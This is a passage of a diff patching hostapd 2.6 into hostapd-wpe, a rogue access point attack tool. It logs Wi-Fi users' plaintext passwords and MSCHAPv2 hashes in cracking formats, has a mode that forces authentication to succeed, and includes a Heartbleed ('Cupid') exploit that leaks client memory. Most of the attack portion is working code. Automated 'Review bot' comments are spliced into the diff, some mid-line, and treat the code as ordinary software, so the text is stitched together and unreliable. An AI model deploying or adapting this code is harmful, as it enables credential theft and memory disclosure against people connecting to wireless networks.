tls_openssl_ref_count = 0; 3547 static int tls_ex_idx_session = -1; 3548 3549@@ -1347,7 +1353,12 @@ struct tls_connection * tls_connection_i 3550 3551 conn->context = context; 3552 SSL_set_app_data(conn->ssl, conn); 3553- SSL_set_msg_callback(conn->ssl, tls_msg_cb); 3554+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3555+ if (wpe_conf.wpe_enable_cupid) 3556+ SSL_set_msg_callback(conn->ssl, wpe_hb_cb); 3557+ else 3558+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 3559+ SSL_set_msg_callback(conn->ssl, tls_msg_cb); 3560 SSL_set_msg_callback_arg(conn->ssl, conn); 3561 options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 | 3562 SSL_OP_SINGLE_DH_USE; 3563@@ -3257,6 +3268,10 @@ openssl_handshake(struct tls_connection 3564 { 3565 int res; 3566 struct wpabuf *out_data; 3567+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3568+ int i; 3569+ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2; 3570+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 3571 3572 /* 3573 * Give TLS handshake data from the server (if available) to OpenSSL 3574@@ -3316,6 +3331,30 @@ openssl_handshake(struct tls_connection 3575 } 3576 wpabuf_put(out_data, res); 3577 3578+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3579+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) { 3580+ 3581+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n"); 3582+ wpe_hb_ptr1 = NULL; 3583+ 3584+ for (i = 0; i < wpe_conf.wpe_hb_num_repeats; i++) { 3585+ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1); 3586+ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1); 3587+ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1); 3588+ 3589+ if (wpe_hb_ptr1) { 3590+ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2); 3591+ } else { 3592+ wpe_hb_ptr1 = wpe_hb_ptr2; 3593+ } 3594+ } 3595+ 3596+ conn->ssl->tlsext_hb_pending = 1; 3597+ wpe_conf.wpe_hb_num_tries--; 3598+ return wpe_hb_ptr1; 3599+ } 3600+#endif 3601+ 3602 return out_data; 3603 } 3604 3605@@ -3431,6 +3470,13 @@ struct 
wpabuf * tls_connection_encrypt(v 3606 tls_show_errors(MSG_INFO, __func__, "BIO_reset failed"); 3607 return NULL; 3608 } 3609+ 3610+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3611+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_appdata) { 3612+ wpe_hb_enc(conn); 3613+ } 3614+#endif 3615+ 3616 res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data)); 3617 if (res < 0) { 3618 tls_show_errors(MSG_INFO, __func__, 3619@@ -3438,6 +3484,12 @@ struct wpabuf * tls_connection_encrypt(v 3620 return NULL; 3621 } 3622 3623+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3624+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata) { 3625+ wpe_hb_enc(conn); 3626+ } 3627+#endif 3628+ 3629 /* Read encrypted data to be sent to the server */ 3630 buf = wpabuf_alloc(wpabuf_len(in_data) + 300); 3631 if (buf == NULL) 3632@@ -4331,3 +4383,69 @@ void tls_connection_remove_session(struc 3633 wpa_printf(MSG_DEBUG, 3634 "OpenSSL: Removed cached session to disable session resumption"); 3635 } 3636+ 3637+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3638+int wpe_hb_enc(struct tls_connection *conn) { 3639+ unsigned char *cbuf, *p; 3640+ 3641+ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */ 3642+ unsigned int padding = 16; //default: 16 /* Use minimum padding */ 3643+ 3644+ if (!SSL_is_init_finished(conn->ssl)) { 3645+ return -1; 3646+ } 3647+ 3648+ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || 3649+ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) { 3650+ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n"); 3651+ } else { 3652+ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n"); 3653+ } 3654+ 3655+ /* Check if padding is too long, payload and padding 3656+ * must not exceed 2^14 - 3 = 16381 bytes in total. 
3657+ */ 3658+ OPENSSL_assert(real_payload + padding <= 16381); 3659+ 3660+ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding); 3661+ 3662+ if(cbuf==NULL) 3663+ return -1; 3664+ 3665+ p = cbuf; 3666+ 3667+ *p++ = TLS1_HB_REQUEST; 3668+ 3669+ 3670+ /* Payload length (18 bytes here) */ 3671+ //s2n(payload, p); /* standards compliant payload */ 3672+ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! */ 3673+ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */ 3674+ 3675+ /* Sequence number */ 3676+ s2n(conn->ssl->tlsext_hb_seq, p); 3677+ /* 16 random bytes */ 3678+ RAND_pseudo_bytes(p, 16); 3679+ //RAND_bytes(p, 16); 3680+ p += 16; 3681+ /* Random padding */ 3682+ RAND_pseudo_bytes(p, padding); 3683+ //RAND_bytes(p, padding); 3684+ 3685+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size); 3686+ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding); 3687+ 3688+ /* Send heartbeat request */ 3689+#ifdef TLS1_RT_HEARTBEAT 3690+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT, 3691+#elif defined(DTLS1_RT_HEARTBEAT) 3692+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, DTLS1_RT_HEARTBEAT, 3693+#endif 3694+ cbuf, 3 + real_payload + padding) >= 0) 3695+ conn->ssl->tlsext_hb_pending = 1; 3696+ OPENSSL_free(cbuf); 3697+ 3698+ return 0; 3699+} 3700+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 3701+ 3702diff -rupN hostapd-2.6/src/eap_server/eap_server.c hostapd-2.6-wpe/src/eap_server/eap_server.c 3703--- hostapd-2.6/src/eap_server/eap_server.c 2016-10-02 20:51:11.000000000 +0200 3704+++ hostapd-2.6-wpe/src/eap_server/eap_server.c 2018-05-21 11:37:58.863577170 +0200 3705@@ -23,7 +23,8 @@ 3706 #define STATE_MACHINE_DATA struct eap_sm 3707 #define STATE_MACHINE_DEBUG_PREFIX "EAP" 3708 3709-#define EAP_MAX_AUTH_ROUNDS 50 3710+//#define EAP_MAX_AUTH_ROUNDS 50 3711+#define EAP_MAX_AUTH_ROUNDS 50000 // wpe >:) 
3712 3713 static void eap_user_free(struct eap_user *user); 3714 3715@@ -164,6 +165,8 @@ int eap_user_get(struct eap_sm *sm, cons 3716 { 3717 struct eap_user *user; 3718 3719+ char ident = 't'; 3720+ 3721 if (sm == NULL || sm->eapol_cb == NULL || 3722 sm->eapol_cb->get_eap_user == NULL) 3723 return -1; 3724@@ -175,6 +178,11 @@ int eap_user_get(struct eap_sm *sm, cons 3725 if (user == NULL) 3726 return -1; 3727 3728+ if (phase2) { 3729+ identity = (const u8 *)&ident; 3730+ identity_len = 1; 3731+ } 3732+ 3733 if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity, 3734 identity_len, phase2, user) != 0) { 3735 eap_user_free(user); 3736diff -rupN hostapd-2.6/src/eap_server/eap_server_mschapv2.c hostapd-2.6-wpe/src/eap_server/eap_server_mschapv2.c 3737--- hostapd-2.6/src/eap_server/eap_server_mschapv2.c 2016-10-02 20:51:11.000000000 +0200 3738+++ hostapd-2.6-wpe/src/eap_server/eap_server_mschapv2.c 2018-05-21 11:37:58.863577170 +0200 3739@@ -12,7 +12,7 @@ 3740 #include "crypto/ms_funcs.h" 3741 #include "crypto/random.h" 3742 #include "eap_i.h" 3743- 3744+#include "wpe/wpe.h" 3745 3746 struct eap_mschapv2_hdr { 3747 u8 op_code; /* MSCHAPV2_OP_* */ 3748@@ -291,7 +291,7 @@ static void eap_mschapv2_process_respons 3749 size_t username_len, user_len; 3750 int res; 3751 char *buf; 3752- 3753+ u8 wpe_challenge_hash[8]; 3754 pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData, 3755 &len); 3756 if (pos == NULL || len < 1) 3757@@ -372,6 +372,8 @@ static void eap_mschapv2_process_respons 3758 } 3759 } 3760 #endif /* CONFIG_TESTING_OPTIONS */ 3761+ challenge_hash(peer_challenge, data->auth_challenge, username, username_len, wpe_challenge_hash); 3762+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24); 3763 3764 if (username_len != user_len || 3765 os_memcmp(username, user, username_len) != 0) { 3766@@ -406,6 +408,11 @@ static void eap_mschapv2_process_respons 3767 return; 3768 } 3769 3770+ if (wpe_conf.wpe_enable_return_success) { 
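Review bot: Raising EAP_MAX_AUTH_ROUNDS from 50 to 50000 effectively removes the bound that lets the EAP server give up on a conversation that never converges; a misbehaving or deliberately stalling peer can now keep a server state machine alive for a thousand times as many request/response rounds per session, which is the denial-of-service exposure the original limit exists to cap. Delete the commented-out old define and replace the `// wpe >:)` marker with a comment that states why that many rounds are needed, e.g. `/* WPE: raised from 50 because <reason> */`, or make the limit a runtime setting so the default stays at 50.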
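Review bot: The phase-2 branch in the second eap_user_get() hunk discards the `identity`/`identity_len` the caller passed and always resolves the one-character name `t`, so the identity the peer actually sent inside the tunnel never reaches get_eap_user() and no other `[2]` entry in the eap_user file can ever match. This is unconditional and undocumented; at minimum a comment at the `char ident = 't';` declaration in the first hunk should say that every phase-2 lookup is redirected to the `"t"` entry, so that other phase-2 lines silently being ignored is not a surprise to whoever edits that file. Passing `&ident` as a `const u8 *` with length 1 is legal but obscure; `static const u8 wpe_phase2_ident[] = "t";` would make the intent readable. eap_user_get() continues outside the hunk.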
3771+ os_memset((void *)nt_response, 0, 24); 3772+ os_memset((void *)expected, 0, 24); 3773+ } 3774+ 3775 if (os_memcmp_const(nt_response, expected, 24) == 0) { 3776 const u8 *pw_hash; 3777 u8 pw_hash_buf[16], pw_hash_hash[16]; 3778@@ -446,6 +453,8 @@ static void eap_mschapv2_process_respons 3779 wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response"); 3780 data->state = FAILURE_REQ; 3781 } 3782+ if (wpe_conf.wpe_enable_return_success) 3783+ data->state = SUCCESS; 3784 } 3785 3786 3787diff -rupN hostapd-2.6/src/eap_server/eap_server_peap.c hostapd-2.6-wpe/src/eap_server/eap_server_peap.c 3788--- hostapd-2.6/src/eap_server/eap_server_peap.c 2016-10-02 20:51:11.000000000 +0200 3789+++ hostapd-2.6-wpe/src/eap_server/eap_server_peap.c 2018-05-21 11:37:58.863577170 +0200 3790@@ -17,7 +17,7 @@ 3791 #include "eap_common/eap_tlv_common.h" 3792 #include "eap_common/eap_peap_common.h" 3793 #include "tncs.h" 3794- 3795+#include "wpe/wpe.h" 3796 3797 /* Maximum supported PEAP version 3798 * 0 = Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt 3799diff -rupN hostapd-2.6/src/eap_server/eap_server_ttls.c hostapd-2.6-wpe/src/eap_server/eap_server_ttls.c 3800--- hostapd-2.6/src/eap_server/eap_server_ttls.c 2016-10-02 20:51:11.000000000 +0200 3801+++ hostapd-2.6-wpe/src/eap_server/eap_server_ttls.c 2018-05-21 11:37:58.863577170 +0200 3802@@ -16,7 +16,7 @@ 3803 #include "eap_server/eap_tls_common.h" 3804 #include "eap_common/chap.h" 3805 #include "eap_common/eap_ttls.h" 3806- 3807+#include "wpe/wpe.h" 3808 3809 #define EAP_TTLS_VERSION 0 3810 3811@@ -538,9 +538,11 @@ static void eap_ttls_process_phase2_pap( 3812 return; 3813 } 3814 3815- if (sm->user->password_len != user_password_len || 3816+ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len); 3817+ 3818+ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len || 3819 os_memcmp_const(sm->user->password, user_password, 3820- 
user_password_len) != 0) { 3821+ user_password_len) != 0)) { 3822 wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password"); 3823 eap_ttls_state(data, FAILURE); 3824 return; 3825@@ -603,8 +605,9 @@ static void eap_ttls_process_phase2_chap 3826 chap_md5(password[0], sm->user->password, sm->user->password_len, 3827 challenge, challenge_len, hash); 3828 3829- if (os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 3830- 0) { 3831+ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len); 3832+ 3833+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) { 3834 wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password"); 3835 eap_ttls_state(data, SUCCESS); 3836 eap_ttls_valid_session(sm, data); 3837@@ -672,7 +675,9 @@ static void eap_ttls_process_phase2_msch 3838 nt_challenge_response(challenge, sm->user->password, 3839 sm->user->password_len, nt_response); 3840 3841- if (os_memcmp_const(nt_response, response + 2 + 24, 24) == 0) { 3842+ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24); 3843+ 3844+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) { 3845 wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response"); 3846 eap_ttls_state(data, SUCCESS); 3847 eap_ttls_valid_session(sm, data); 3848@@ -694,7 +699,7 @@ static void eap_ttls_process_phase2_msch 3849 u8 *response, size_t response_len) 3850 { 3851 u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge, 3852- *auth_challenge; 3853+ *auth_challenge, wpe_challenge_hash[8]; 3854 size_t username_len, i; 3855 3856 if (challenge == NULL || response == NULL || 3857@@ -779,6 +784,9 @@ static void eap_ttls_process_phase2_msch 3858 } 3859 3860 rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8; 3861+ 3862+ challenge_hash(peer_challenge, auth_challenge, username, 
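Review bot: The rewritten `if` replaces `os_memcmp_const` with `os_memcmp`, reintroducing a data-dependent early exit on the CHAP hash comparison that upstream had deliberately made constant-time; the MSCHAP hunk at @@ -672 does the same for the 24-byte NT-Response comparison. Nothing in the change needs a plain memcmp, so keep `os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0` here and `os_memcmp_const(nt_response, response + 2 + 24, 24) == 0` there. Both eap_ttls_process_phase2_chap() and eap_ttls_process_phase2_mschap() start and end outside their hunks.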
username_len, wpe_challenge_hash);
3863+ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24);
3864 #ifdef CONFIG_TESTING_OPTIONS
3865 {
3866 u8 challenge2[8];
3867diff -rupN hostapd-2.6/src/Makefile hostapd-2.6-wpe/src/Makefile
3868--- hostapd-2.6/src/Makefile 2016-10-02 20:51:11.000000000 +0200
3869+++ hostapd-2.6-wpe/src/Makefile 2018-05-21 11:37:58.863577170 +0200
3870@@ -1,5 +1,5 @@
3871 SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps
3872-SUBDIRS += fst
3873+SUBDIRS += fst wpe
3874 
3875 all:
3876 for d in $(SUBDIRS); do [ -d $$d ] && $(MAKE) -C $$d; done
3877diff -rupN hostapd-2.6/src/utils/wpa_debug.c hostapd-2.6-wpe/src/utils/wpa_debug.c
3878--- hostapd-2.6/src/utils/wpa_debug.c 2016-10-02 20:51:11.000000000 +0200
3879+++ hostapd-2.6-wpe/src/utils/wpa_debug.c 2018-05-21 11:37:58.863577170 +0200
3880@@ -30,7 +30,7 @@ static FILE *wpa_debug_tracing_file = NU
3881 
3882 
3883 int wpa_debug_level = MSG_INFO;
3884-int wpa_debug_show_keys = 0;
3885+int wpa_debug_show_keys = 1; // WPE >:)
3886 int wpa_debug_timestamp = 0;
3887 
3888 
3889diff -rupN hostapd-2.6/src/wpe/Makefile hostapd-2.6-wpe/src/wpe/Makefile
3890--- hostapd-2.6/src/wpe/Makefile 1970-01-01 01:00:00.000000000 +0100
3891+++ hostapd-2.6-wpe/src/wpe/Makefile 2018-05-21 11:37:58.863577170 +0200
3892@@ -0,0 +1,8 @@
3893+all:
3894+ @echo Nothing to be made.
3895+ 
3896+clean:
3897+ rm -f *~ *.o *.d *.gcno *.gcda *.gcov
3898+ 
3899+install:
3900+ @echo Nothing to be made.
3901diff -rupN hostapd-2.6/src/wpe/wpe.c hostapd-2.6-wpe/src/wpe/wpe.c
3902--- hostapd-2.6/src/wpe/wpe.c 1970-01-01 01:00:00.000000000 +0100
3903+++ hostapd-2.6-wpe/src/wpe/wpe.c 2018-05-21 11:53:09.579560861 +0200
3904@@ -0,0 +1,232 @@
3905+/*
3906+ wpe.c -
3907+ brad.antoniewicz@foundstone.com
3908+ Implements WPE (Wireless Pwnage Edition) functionality within
3909+ hostapd. 
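Review bot: The return value of `challenge_hash()` on the new line is discarded; in hostapd that function returns an int that reports failure of the underlying hash step, and on failure `wpe_challenge_hash` stays uninitialized and the following `wpe_log_chalresp` call writes stack contents to the log as the challenge. Guard it as `if (challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash) == 0)` around the log call. The literals `8` and `24` here duplicate `MSCHAPV2_CHAL_HASH_LEN` and `MSCHAPV2_RESP_LEN`, which wpe.c defines privately; moving those defines into wpe.h would let this call site and the `wpe_challenge_hash[8]` declaration in the -694 hunk use them. The enclosing function starts and ends outside the hunk.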
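Review bot: Changing the initializer of `wpa_debug_show_keys` to 1 alters a global default for every build of this tree, not just the WPE feature, and makes the `-K` command-line option, which increments this variable at startup, redundant. Prefer leaving the initializer at `0` and setting the variable at runtime where the WPE options are parsed, next to `wpe_conf`, so the behaviour is tied to the feature that needs it and visible to the operator. The trailing `// WPE >:)` is also C++-style comment syntax in a file that uses `/* */` throughout.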
3910+ 
3911+ WPE functionality focuses on targeting connecting users. At
3912+ it's core it implements credential logging (originally
3913+ implemented in FreeRADIUS-WPE), but also includes other patches
3914+ for other client attacks that have been modified to some extend.
3915+ 
3916+ FreeRADIUS-WPE: https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/freeradius-wpe
3917+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
3918+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
3919+*/
3920+ 
3921+#include <time.h>
3922+#include <openssl/ssl.h>
3923+#include "includes.h"
3924+#include "common.h"
3925+#include "wpe/wpe.h"
3926+#include "utils/wpa_debug.h"
3927+ 
3928+#define wpe_logfile_default_location "./hostapd-wpe.log"
3929+ 
3930+ 
3931+#define MSCHAPV2_CHAL_HASH_LEN 8
3932+#define MSCHAPV2_CHAL_LEN 16
3933+#define MSCHAPV2_RESP_LEN 24
3934+ 
3935+#if OPENSSL_VERSION_NUMBER < 0x10100000L
3936+ char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff";
3937+ size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]);
3938+#endif
3939+ 
3940+struct wpe_config wpe_conf = {
3941+ .wpe_logfile = wpe_logfile_default_location,
3942+ .wpe_logfile_fp = NULL,
3943+ .wpe_enable_karma = 0,
3944+ .wpe_enable_cupid = 0,
3945+ .wpe_enable_return_success = 0,
3946+#if OPENSSL_VERSION_NUMBER < 0x10100000L
3947+ .wpe_hb_send_before_handshake = 1,
3948+ .wpe_hb_send_before_appdata = 0,
3949+ .wpe_hb_send_after_appdata = 0,
3950+ .wpe_hb_payload_size = 50000,
3951+ .wpe_hb_num_tries = 1,
3952+ .wpe_hb_num_repeats = 10
3953+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */
3954+};
3955+ 
3956+void wpe_log_file_and_stdout(char const *fmt, ...) 
{ 3957+ 3958+ if ( wpe_conf.wpe_logfile_fp == NULL ) { 3959+ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a"); 3960+ if ( wpe_conf.wpe_logfile_fp == NULL ) 3961+ printf("WPE: Cannot file log file"); 3962+ } 3963+ 3964+ va_list ap; 3965+ 3966+ va_start(ap, fmt); 3967+ vprintf(fmt, ap); 3968+ va_end(ap); 3969+ 3970+ va_start(ap, fmt); 3971+ if ( wpe_conf.wpe_logfile_fp != NULL ) 3972+ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap); 3973+ va_end(ap); 3974+} 3975+ 3976+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) { 3977+ time_t nowtime; 3978+ int x; 3979+ 3980+ nowtime = time(NULL); 3981+ 3982+ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime)); 3983+ wpe_log_file_and_stdout("\t username:\t"); 3984+ for (x=0; x<username_len; x++) 3985+ wpe_log_file_and_stdout("%c",username[x]); 3986+ wpe_log_file_and_stdout("\n"); 3987+ 3988+ wpe_log_file_and_stdout("\t challenge:\t"); 3989+ for (x=0; x<challenge_len - 1; x++) 3990+ wpe_log_file_and_stdout("%02x:",challenge[x]); 3991+ wpe_log_file_and_stdout("%02x\n",challenge[x]); 3992+ 3993+ wpe_log_file_and_stdout("\t response:\t"); 3994+ for (x=0; x<response_len - 1; x++) 3995+ wpe_log_file_and_stdout("%02x:",response[x]); 3996+ wpe_log_file_and_stdout("%02x\n",response[x]); 3997+ 3998+ if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) { 3999+ wpe_log_file_and_stdout("\t jtr NETNTLM:\t\t"); 4000+ for (x=0; x<username_len; x++) 4001+ wpe_log_file_and_stdout("%c",username[x]); 4002+ wpe_log_file_and_stdout(":$NETNTLM$"); 4003+ for (x=0; x<challenge_len; x++) 4004+ wpe_log_file_and_stdout("%02x",challenge[x]); 4005+ wpe_log_file_and_stdout("$"); 4006+ for (x=0; x<response_len; x++) 4007+ wpe_log_file_and_stdout("%02x",response[x]); 4008+ wpe_log_file_and_stdout("\n"); 4009+ 4010+ wpe_log_file_and_stdout("\t hashcat NETNTLM:\t"); 4011+ for (x=0; x<username_len; x++) 4012+ 
wpe_log_file_and_stdout("%c",username[x]); 4013+ wpe_log_file_and_stdout("::::"); 4014+ for (x=0; x<response_len; x++) 4015+ wpe_log_file_and_stdout("%02x",response[x]); 4016+ wpe_log_file_and_stdout(":"); 4017+ for (x=0; x<challenge_len; x++) 4018+ wpe_log_file_and_stdout("%02x",challenge[x]); 4019+ wpe_log_file_and_stdout("\n"); 4020+ 4021+ } 4022+} 4023+ 4024+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len) { 4025+ time_t nowtime; 4026+ int x; 4027+ 4028+ nowtime = time(NULL); 4029+ 4030+ wpe_log_file_and_stdout("\n\n%s: %s",type, ctime(&nowtime)); 4031+ wpe_log_file_and_stdout("\t username:\t"); 4032+ for (x=0; x<username_len; x++) 4033+ wpe_log_file_and_stdout("%c",username[x]); 4034+ wpe_log_file_and_stdout("\n"); 4035+ 4036+ wpe_log_file_and_stdout("\t password:\t"); 4037+ for (x=0; x<password_len; x++) 4038+ wpe_log_file_and_stdout("%c",password[x]); 4039+ wpe_log_file_and_stdout("\n"); 4040+} 4041+ 4042+/* 4043+ Taken from asleap, who took from nmap, who took from tcpdump :) 4044+*/ 4045+void wpe_hexdump(unsigned char *bp, unsigned int length) 4046+{ 4047+ 4048+ /* stolen from tcpdump, then kludged extensively */ 4049+ 4050+ static const char asciify[] = 4051+ "................................ 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~................................................................................................................................."; 4052+ 4053+ const unsigned short *sp; 4054+ const unsigned char *ap; 4055+ unsigned int i, j; 4056+ int nshorts, nshorts2; 4057+ int padding; 4058+ 4059+ wpe_log_file_and_stdout("\n\t"); 4060+ padding = 0; 4061+ sp = (unsigned short *)bp; 4062+ ap = (unsigned char *)bp; 4063+ nshorts = (unsigned int)length / sizeof(unsigned short); 4064+ nshorts2 = (unsigned int)length / sizeof(unsigned short); 4065+ i = 0; 4066+ j = 0; 4067+ while (1) { 4068+ while (--nshorts >= 0) { 4069+ wpe_log_file_and_stdout(" %04x", ntohs(*sp)); 4070+ sp++; 4071+ if ((++i % 8) == 0) 4072+ break; 4073+ } 4074+ if (nshorts < 0) { 4075+ if ((length & 1) && (((i - 1) % 8) != 0)) { 4076+ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp); 4077+ padding++; 4078+ } 4079+ nshorts = (8 - (nshorts2 - nshorts)); 4080+ while (--nshorts >= 0) { 4081+ wpe_log_file_and_stdout(" "); 4082+ } 4083+ if (!padding) 4084+ wpe_log_file_and_stdout(" "); 4085+ } 4086+ wpe_log_file_and_stdout(" "); 4087+ 4088+ while (--nshorts2 >= 0) { 4089+ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]); 4090+ ap += 2; 4091+ if ((++j % 8) == 0) { 4092+ wpe_log_file_and_stdout("\n\t"); 4093+ break; 4094+ } 4095+ } 4096+ if (nshorts2 < 0) { 4097+ if ((length & 1) && (((j - 1) % 8) != 0)) { 4098+ wpe_log_file_and_stdout("%c", asciify[*ap]); 4099+ } 4100+ break; 4101+ } 4102+ } 4103+ if ((length & 1) && (((i - 1) % 8) == 0)) { 4104+ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp); 4105+ wpe_log_file_and_stdout(" %c", 4106+ asciify[*ap]); 4107+ } 4108+ wpe_log_file_and_stdout("\n"); 4109+} 4110+ 4111+ 4112+#if OPENSSL_VERSION_NUMBER < 0x10100000L 4113+/* https://github.com/openssl/openssl/issues/2122 */ 4114+ 4115+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const 
void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) { 4116+#ifdef TLS1_RT_HEARTBEAT 4117+ if (v_content_type == TLS1_RT_HEARTBEAT) { 4118+#elif defined(DTLS1_RT_HEARTBEAT) 4119+ if (v_content_type == DTLS1_RT_HEARTBEAT) { 4120+#endif 4121+ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n"); 4122+ v_ssl->tlsext_hb_pending = 1; 4123+ wpe_hexdump((unsigned char *)v_buf, v_len); 4124+ } 4125+} 4126+ 4127+ 4128+char *wpe_hb_clear() { 4129+ char *p; 4130+ // set payload size 4131+ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3]; 4132+ s2n(wpe_conf.wpe_hb_payload_size, p); 4133+ 4134+ return wpe_hb_msg; 4135+} 4136+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 4137diff -rupN hostapd-2.6/src/wpe/wpe.h hostapd-2.6-wpe/src/wpe/wpe.h 4138--- hostapd-2.6/src/wpe/wpe.h 1970-01-01 01:00:00.000000000 +0100 4139+++ hostapd-2.6-wpe/src/wpe/wpe.h 2018-05-21 11:37:58.863577170 +0200 4140@@ -0,0 +1,54 @@ 4141+/* 4142+ wpe.h - 4143+ brad.antoniewicz@foundstone.com 4144+ Implements WPE (Wireless Pwnage Edition) functionality within 4145+ hostapd. 4146+ 4147+ WPE functionality focuses on targeting connecting users. At 4148+ it's core it implements credential logging (originally 4149+ implemented in FreeRADIUS-WPE), but also includes other patches 4150+ for other client attacks. 
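Review bot: In `wpe_log_chalresp` the loop bounds `x < challenge_len - 1` and `x < response_len - 1` are evaluated in `size_t`, so a zero-length challenge or response wraps to `SIZE_MAX` and both the loop and the trailing `challenge[x]` / `response[x]` print read past the buffer; `x` is also an `int` compared against `size_t` there and in `wpe_log_basic`. Declare `size_t x;` and write each hex loop as `for (x = 0; x < challenge_len; x++) wpe_log_file_and_stdout(x ? ":%02x" : "%02x", challenge[x]);` followed by the `"\n"` call, which removes the post-loop element access entirely. In `wpe_log_file_and_stdout` the failure path `printf("WPE: Cannot file log file");` has a typo, no newline and no reason, and is repeated on every call; `wpa_printf(MSG_ERROR, "WPE: Cannot open log file %s: %s", wpe_conf.wpe_logfile, strerror(errno));` matches the file's own logging style. `wpe_hexdump` reads the byte buffer through an `unsigned short *` cast, which is an unaligned access and a strict-aliasing violation on `u8` data; assembling each 16-bit value from two bytes avoids both, and `char *wpe_hb_clear()` should be declared `(void)`.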
4151+ 
4152+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
4153+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
4154+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
4155+*/
4156+#include <openssl/ssl.h>
4157+ 
4158+struct wpe_config {
4159+ char *wpe_logfile;
4160+ FILE *wpe_logfile_fp;
4161+ unsigned int wpe_enable_karma;
4162+ unsigned int wpe_enable_cupid;
